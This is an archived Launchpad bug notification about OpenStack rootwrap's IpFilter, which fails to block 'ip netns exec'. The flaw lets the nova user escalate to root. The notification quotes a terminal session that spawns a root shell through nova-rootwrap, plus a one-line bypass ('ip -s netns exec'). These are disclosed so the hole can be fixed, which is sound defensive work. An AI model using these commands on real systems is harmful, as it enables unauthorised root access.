yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1081795] Re: Nova rootwrap is too permissive with iproute(2) arguments

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Thierry Carrez <thierry.carrez+lp@xxxxxxxxx>
Date: Fri, 07 Feb 2014 14:35:31 -0000
Reply-to: Bug 1081795 <1081795@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

Rewritten as a oslo.rootwrap bug.

** Project changed: nova => oslo

** Changed in: oslo
   Importance: Wishlist => High

** Changed in: oslo
       Status: In Progress => Triaged

** Changed in: oslo
     Assignee: Mark McClain (markmcclain) => (unassigned)

** Summary changed:

- Nova rootwrap is too permissive with iproute(2) arguments
+ IpFilter fails to prevent ip netns exec

** Summary changed:

- IpFilter fails to prevent ip netns exec
+ oslo.rootwrap IpFilter fails to prevent ip netns exec

** Description changed:

- The Nova rootwrap filters allow the nova user to spawn an unrestricted
- root shell.  This is a problem that we fixed in Quantum over the summer,
- so I've got code to close the hole.
+ This is an oslo.rootwrap bug.
  
+ IpFilter is designed to allow any ip command, unless the second
+ parameter is "netns" (in which case you only allow ip netns
+ {list,add,delete}.
  
- vagrant@vagrant-precise:~/devstack$ sudo /usr/local/bin/nova-rootwrap /etc/nova/rootwrap.conf ip netns add foo
- vagrant@vagrant-precise:~/devstack$ sudo /usr/local/bin/nova-rootwrap /etc/nova/rootwrap.conf ip netns exec foo bash
- root@vagrant-precise:~/devstack# whoami
- root
- root@vagrant-precise:~/devstack# exit
- exit
- vagrant@vagrant-precise:~/devstack$ 
+ The trick is it's trivial to work around this (just run 'ip -s netns
+ exec').
  
- 
- For contrast here's how the Quantum wrapper behaves:
- 
- vagrant@vagrant-precise:~/devstack$ sudo /usr/local/bin/quantum-rootwrap /etc/quantum/rootwrap.conf ip netns add foo
- vagrant@vagrant-precise:~/devstack$ sudo /usr/local/bin/quantum-rootwrap /etc/quantum/rootwrap.conf ip netns exec foo bash
- Unauthorized command: ip netns exec foo bash
- vagrant@vagrant-precise:~/devstack$
+ Once that's fixed, Nova should update from using a CommandFilter to
+ using the IpFilter for calling 'ip'.

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1081795

Title:
  oslo.rootwrap IpFilter fails to prevent ip netns exec

Status in Oslo - a Library of Common OpenStack Code:
  Triaged

Bug description:
  This is an oslo.rootwrap bug.

  IpFilter is designed to allow any ip command, unless the second
  parameter is "netns" (in which case you only allow ip netns
  {list,add,delete}.

  The trick is it's trivial to work around this (just run 'ip -s netns
  exec').

  Once that's fixed, Nova should update from using a CommandFilter to
  using the IpFilter for calling 'ip'.

To manage notifications about this bug go to:
https://bugs.launchpad.net/oslo/+bug/1081795/+subscriptions